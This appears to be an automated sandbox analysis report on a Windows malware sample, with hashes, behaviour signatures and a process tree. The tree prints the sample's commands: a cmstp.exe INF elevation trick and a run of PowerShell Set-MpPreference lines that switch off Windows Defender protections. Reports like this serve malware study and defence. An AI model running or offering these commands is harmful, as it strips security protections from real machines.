Resubmissions

24/02/2022, 22:11

220224-131k2sfaej 10

07/01/2021, 07:12

210107-27q11jvw52 10

Analysis

  • max time kernel
    174s
  • max time network
    168s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    24/02/2022, 22:11

General

  • Target

    qGHJqiji.exe

  • Size

    9KB

  • MD5

    1c0d1af30fc12cb964335c0a20ffeedd

  • SHA1

    20669e2263e4939732a938e1bfa2f770e0f45aa4

  • SHA256

    5081ca4672184aaa9e4afa22aec015b79038fcca7d7f8c0650727c541c3d884b

  • SHA512

    b0541379baca8fc491b6027958b71672de886f13713f0704201d53b140b198f750c90c953ceeed221942cfe792e39fa22684aa0dd064f2aac719da193c5213d0

Score
10/10

Malware Config

Signatures

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\qGHJqiji.exe
    "C:\Users\Admin\AppData\Local\Temp\qGHJqiji.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:532
    • \??\c:\windows\system32\cmstp.exe
      "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\3j5xoze0.inf
      2⤵
        PID:4144
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      1⤵
      • Checks SCSI registry key(s)
      • Checks processor information in registry
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:664
    • C:\Windows\system32\cmd.exe
      cmd /c start C:\Windows\temp\qp14suv1.vbs
      1⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:208
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Windows\temp\qp14suv1.vbs"
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4968
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Windows\temp\qp14suv1.vbs" /elevate
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4140
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:5088
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4384
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4296
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3728
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1080
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1996
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1204
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2380
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4056
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1824
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3440
    • C:\Windows\system32\taskkill.exe
      taskkill /IM cmstp.exe /F
      1⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:4976

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/532-130-0x0000000000730000-0x0000000000738000-memory.dmp

      Filesize

      32KB

    • memory/1080-155-0x000001EACAE63000-0x000001EACAE65000-memory.dmp

      Filesize

      8KB

    • memory/1080-152-0x00007FFC401C3000-0x00007FFC401C5000-memory.dmp

      Filesize

      8KB

    • memory/1080-165-0x000001EACAE66000-0x000001EACAE68000-memory.dmp

      Filesize

      8KB

    • memory/1080-154-0x000001EACAE60000-0x000001EACAE62000-memory.dmp

      Filesize

      8KB

    • memory/1204-167-0x0000014D61D78000-0x0000014D61D79000-memory.dmp

      Filesize

      4KB

    • memory/1204-159-0x0000014D61D73000-0x0000014D61D75000-memory.dmp

      Filesize

      8KB

    • memory/1204-156-0x00007FFC401C3000-0x00007FFC401C5000-memory.dmp

      Filesize

      8KB

    • memory/1204-158-0x0000014D61D70000-0x0000014D61D72000-memory.dmp

      Filesize

      8KB

    • memory/1204-140-0x0000014D61D76000-0x0000014D61D78000-memory.dmp

      Filesize

      8KB

    • memory/1824-174-0x000001D176D46000-0x000001D176D48000-memory.dmp

      Filesize

      8KB

    • memory/1824-175-0x00007FFC401C3000-0x00007FFC401C5000-memory.dmp

      Filesize

      8KB

    • memory/1824-177-0x000001D176D40000-0x000001D176D42000-memory.dmp

      Filesize

      8KB

    • memory/1824-178-0x000001D176D43000-0x000001D176D45000-memory.dmp

      Filesize

      8KB

    • memory/1996-150-0x00007FFC401C3000-0x00007FFC401C5000-memory.dmp

      Filesize

      8KB

    • memory/1996-151-0x000002B8F8D90000-0x000002B8F8D92000-memory.dmp

      Filesize

      8KB

    • memory/1996-153-0x000002B8F8D93000-0x000002B8F8D95000-memory.dmp

      Filesize

      8KB

    • memory/1996-166-0x000002B8F8D96000-0x000002B8F8D98000-memory.dmp

      Filesize

      8KB

    • memory/2380-176-0x00000181F0D98000-0x00000181F0D99000-memory.dmp

      Filesize

      4KB

    • memory/2380-160-0x00007FFC401C3000-0x00007FFC401C5000-memory.dmp

      Filesize

      8KB

    • memory/2380-145-0x00000181F0D96000-0x00000181F0D98000-memory.dmp

      Filesize

      8KB

    • memory/2380-163-0x00000181F0D93000-0x00000181F0D95000-memory.dmp

      Filesize

      8KB

    • memory/2380-162-0x00000181F0D90000-0x00000181F0D92000-memory.dmp

      Filesize

      8KB

    • memory/3440-180-0x000001947EE06000-0x000001947EE08000-memory.dmp

      Filesize

      8KB

    • memory/3440-136-0x000001947EE03000-0x000001947EE05000-memory.dmp

      Filesize

      8KB

    • memory/3440-179-0x000001947EE00000-0x000001947EE02000-memory.dmp

      Filesize

      8KB

    • memory/3440-135-0x00007FFC401C3000-0x00007FFC401C5000-memory.dmp

      Filesize

      8KB

    • memory/3728-168-0x0000021BF6416000-0x0000021BF6418000-memory.dmp

      Filesize

      8KB

    • memory/3728-146-0x00007FFC401C3000-0x00007FFC401C5000-memory.dmp

      Filesize

      8KB

    • memory/3728-148-0x0000021BF6413000-0x0000021BF6415000-memory.dmp

      Filesize

      8KB

    • memory/3728-147-0x0000021BF6410000-0x0000021BF6412000-memory.dmp

      Filesize

      8KB

    • memory/4056-170-0x00007FFC401C3000-0x00007FFC401C5000-memory.dmp

      Filesize

      8KB

    • memory/4056-171-0x000002C7C1E40000-0x000002C7C1E42000-memory.dmp

      Filesize

      8KB

    • memory/4056-172-0x000002C7C1E43000-0x000002C7C1E45000-memory.dmp

      Filesize

      8KB

    • memory/4056-173-0x000002C7C1E46000-0x000002C7C1E48000-memory.dmp

      Filesize

      8KB

    • memory/4296-141-0x00007FFC401C3000-0x00007FFC401C5000-memory.dmp

      Filesize

      8KB

    • memory/4296-161-0x00000202226D6000-0x00000202226D8000-memory.dmp

      Filesize

      8KB

    • memory/4296-181-0x00000202226D8000-0x00000202226D9000-memory.dmp

      Filesize

      4KB

    • memory/4296-149-0x00000202226D3000-0x00000202226D5000-memory.dmp

      Filesize

      8KB

    • memory/4296-142-0x00000202226D0000-0x00000202226D2000-memory.dmp

      Filesize

      8KB

    • memory/4384-164-0x000001879CF28000-0x000001879CF29000-memory.dmp

      Filesize

      4KB

    • memory/4384-144-0x000001879CF23000-0x000001879CF25000-memory.dmp

      Filesize

      8KB

    • memory/4384-143-0x000001879CF20000-0x000001879CF22000-memory.dmp

      Filesize

      8KB

    • memory/4384-169-0x000001879CF26000-0x000001879CF28000-memory.dmp

      Filesize

      8KB

    • memory/4384-139-0x00007FFC401C3000-0x00007FFC401C5000-memory.dmp

      Filesize

      8KB

    • memory/5088-182-0x000002069CA98000-0x000002069CA99000-memory.dmp

      Filesize

      4KB

    • memory/5088-137-0x000002069CA90000-0x000002069CA92000-memory.dmp

      Filesize

      8KB

    • memory/5088-138-0x000002069CA93000-0x000002069CA95000-memory.dmp

      Filesize

      8KB

    • memory/5088-157-0x000002069CA96000-0x000002069CA98000-memory.dmp

      Filesize

      8KB

    • memory/5088-134-0x00007FFC401C3000-0x00007FFC401C5000-memory.dmp

      Filesize

      8KB

    • memory/5088-133-0x00000206B7F40000-0x00000206B7F62000-memory.dmp

      Filesize

      136KB